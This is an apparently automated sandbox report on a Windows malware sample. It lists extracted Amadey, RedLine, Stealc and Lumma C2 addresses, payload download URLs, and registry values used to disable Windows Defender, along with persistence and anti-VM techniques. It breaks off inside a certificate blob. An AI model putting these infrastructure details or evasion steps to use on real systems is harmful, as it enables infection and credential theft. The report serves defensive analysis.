Analysis
-
max time kernel
104s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 06:32
Static task
static1
Behavioral task
behavioral1
Sample
09c586796227f25da3e37d9203d0c48e.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
09c586796227f25da3e37d9203d0c48e.exe
Resource
win10v2004-20250217-en
General
-
Target
09c586796227f25da3e37d9203d0c48e.exe
-
Size
2.0MB
-
MD5
09c586796227f25da3e37d9203d0c48e
-
SHA1
49d5b87f50efd6da9fe9d4131680a3f1a2e5a379
-
SHA256
db1bb60253ead1efd2cac1fc3dd58052d28c2e093cfd9a5abae563ebb658dd59
-
SHA512
494bbf64373f47b9d5f3fdd8c4d0f85e68171cac3aa2fc89e2678a84d1d23cb5962e582a40cbe1abc787be003ea1b8e8c7eeac7094d2942bc3062211533e07f4
-
SSDEEP
49152:tLKfSQvj5YQMjrx2vPTVpJBdhAA/lOm/AlvQ1ewa:tWfS6OrqPT7JB74QG
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
lumma
https://mercharena.biz/api
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3972-1026-0x00000000000D0000-0x000000000052A000-memory.dmp healer behavioral2/memory/3972-1027-0x00000000000D0000-0x000000000052A000-memory.dmp healer behavioral2/memory/3972-1249-0x00000000000D0000-0x000000000052A000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/4864-221-0x0000000000190000-0x0000000000608000-memory.dmp family_sectoprat behavioral2/memory/4864-222-0x0000000000190000-0x0000000000608000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 09c586796227f25da3e37d9203d0c48e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 38 4676 powershell.exe 42 4676 powershell.exe 50 4676 powershell.exe 51 4676 powershell.exe 56 4676 powershell.exe 64 4676 powershell.exe 66 4676 powershell.exe 67 4676 powershell.exe 68 4676 powershell.exe 73 4676 powershell.exe 78 4676 powershell.exe 86 4676 powershell.exe 94 4676 powershell.exe 95 4676 powershell.exe 98 4676 powershell.exe 99 4676 powershell.exe 100 4676 powershell.exe 101 4676 powershell.exe 102 4676 powershell.exe 103 4676 powershell.exe 104 4676 powershell.exe 106 4676 powershell.exe 108 4676 powershell.exe 109 4676 powershell.exe 110 4676 powershell.exe 111 4676 powershell.exe 112 4676 powershell.exe 113 4676 powershell.exe 114 4676 powershell.exe 123 4676 powershell.exe 126 4676 powershell.exe 127 4676 powershell.exe 129 4676 powershell.exe 134 4676 powershell.exe 135 4676 powershell.exe 137 4676 powershell.exe 138 4676 powershell.exe 141 4676 powershell.exe 143 4676 powershell.exe 146 4676 powershell.exe 147 4676 powershell.exe 148 4676 powershell.exe 149 4676 powershell.exe 150 4676 powershell.exe 151 4676 powershell.exe 152 4676 powershell.exe 153 4676 powershell.exe 154 4676 powershell.exe 157 4676 powershell.exe 161 4676 powershell.exe 162 4676 powershell.exe 163 4676 powershell.exe 169 4676 powershell.exe 173 4676 powershell.exe 174 4676 powershell.exe 178 4676 powershell.exe 181 4676 powershell.exe 182 4676 powershell.exe 187 4676 powershell.exe 190 4676 powershell.exe 202 4676 powershell.exe 206 4676 powershell.exe 210 4676 powershell.exe 212 4676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 6008 powershell.exe 2064 powershell.exe 3964 powershell.exe 3488 powershell.exe 5984 powershell.exe 1292 powershell.exe 5328 powershell.exe 5592 powershell.exe 5764 powershell.exe 5384 powershell.exe -
Downloads MZ/PE file 27 IoCs
flow pid Process 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 3 1484 skotes.exe 215 1484 skotes.exe 215 1484 skotes.exe 215 1484 skotes.exe 215 1484 skotes.exe 215 1484 skotes.exe 275 5104 futors.exe 275 5104 futors.exe 275 5104 futors.exe 251 3488 powershell.exe 288 5984 powershell.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1356 chrome.exe 4464 chrome.exe 4908 msedge.exe 2404 msedge.exe 5736 msedge.exe 2064 chrome.exe 2260 chrome.exe 6024 msedge.exe 5700 msedge.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09c586796227f25da3e37d9203d0c48e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09c586796227f25da3e37d9203d0c48e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation 09c586796227f25da3e37d9203d0c48e.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 31 IoCs
pid Process 1484 skotes.exe 1764 c379a1bd05.exe 4556 c379a1bd05.exe 2740 13Z5sqy.exe 3044 jonbDes.exe 2980 Bjkm5hE.exe 4168 Bjkm5hE.exe 3832 Fe36XBk.exe 4864 ViGgA8C.exe 2368 DTQCxXZ.exe 4860 TaVOM7x.exe 1504 skotes.exe 1816 d2YQIJa.exe 952 sHN20me.exe 1252 spoDnGT.exe 1016 Ta3ZyUR.exe 1344 Ta3ZyUR.exe 4172 Ta3ZyUR.exe 3016 qFqSpAp.exe 952 m5UP2Yj.exe 4160 jROrnzx.exe 1520 jROrnzx.exe 5104 7aencsM.exe 2496 7aencsM.exe 884 amnew.exe 5104 futors.exe 2988 c4a7457852.exe 3972 TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE 5276 7aencsM.exe 3464 7aencsM.exe 5832 483d2fa8a0d53818306efeb32d3.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine spoDnGT.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine ViGgA8C.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine 09c586796227f25da3e37d9203d0c48e.exe Key opened \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine skotes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c4a7457852.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085378101\\c4a7457852.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085379021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000c000000023b83-971.dat autoit_exe behavioral2/files/0x0005000000022a0a-1757.dat autoit_exe behavioral2/files/0x000c000000023cdf-1794.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 4904 09c586796227f25da3e37d9203d0c48e.exe 1484 skotes.exe 3832 Fe36XBk.exe 4864 ViGgA8C.exe 1504 skotes.exe 1816 d2YQIJa.exe 952 sHN20me.exe 1252 spoDnGT.exe 952 m5UP2Yj.exe 3972 TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1764 set thread context of 4556 1764 c379a1bd05.exe 86 PID 2980 set thread context of 4168 2980 Bjkm5hE.exe 94 PID 2740 set thread context of 4620 2740 13Z5sqy.exe 108 PID 1016 set thread context of 4172 1016 Ta3ZyUR.exe 116 PID 4160 set thread context of 1520 4160 jROrnzx.exe 123 PID 5104 set thread context of 2496 5104 7aencsM.exe 129 PID 4860 set thread context of 5016 4860 TaVOM7x.exe 126 PID 5276 set thread context of 3464 5276 7aencsM.exe 181 -
resource yara_rule behavioral2/memory/5408-1542-0x00007FFF15F80000-0x00007FFF16569000-memory.dmp upx behavioral2/memory/5408-1545-0x00007FFF2B4A0000-0x00007FFF2B4AF000-memory.dmp upx behavioral2/memory/5408-1544-0x00007FFF2A3D0000-0x00007FFF2A3F3000-memory.dmp upx behavioral2/memory/5408-1546-0x00007FFF2A5D0000-0x00007FFF2A5E9000-memory.dmp upx behavioral2/memory/5408-1547-0x00007FFF2B490000-0x00007FFF2B49D000-memory.dmp upx behavioral2/memory/5408-1549-0x00007FFF28E90000-0x00007FFF28EBD000-memory.dmp upx behavioral2/memory/5408-1548-0x00007FFF28F50000-0x00007FFF28F69000-memory.dmp upx behavioral2/memory/5408-1550-0x00007FFF25470000-0x00007FFF254A6000-memory.dmp upx behavioral2/memory/5408-1551-0x00007FFF2A3C0000-0x00007FFF2A3CD000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 09c586796227f25da3e37d9203d0c48e.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023d06-1414.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 2812 1764 WerFault.exe 85 3560 2980 WerFault.exe 93 2752 1016 WerFault.exe 114 5044 4160 WerFault.exe 121 4288 5104 WerFault.exe 127 1940 5276 WerFault.exe 179 4364 5928 WerFault.exe 191 5232 1468 WerFault.exe 205 4312 4372 WerFault.exe 212 5280 5800 WerFault.exe 222 5676 5044 WerFault.exe 230 2636 3032 WerFault.exe 241 -
System Location Discovery: System Language Discovery 1 TTPs 53 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c379a1bd05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c379a1bd05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoDnGT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09c586796227f25da3e37d9203d0c48e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c4a7457852.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempDEQSZDBGHXZIACILVVDMBQU2XDC3R5XO.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4668 timeout.exe 4868 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 2516 taskkill.exe 704 taskkill.exe 4604 taskkill.exe 6108 taskkill.exe 1480 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 7aencsM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e03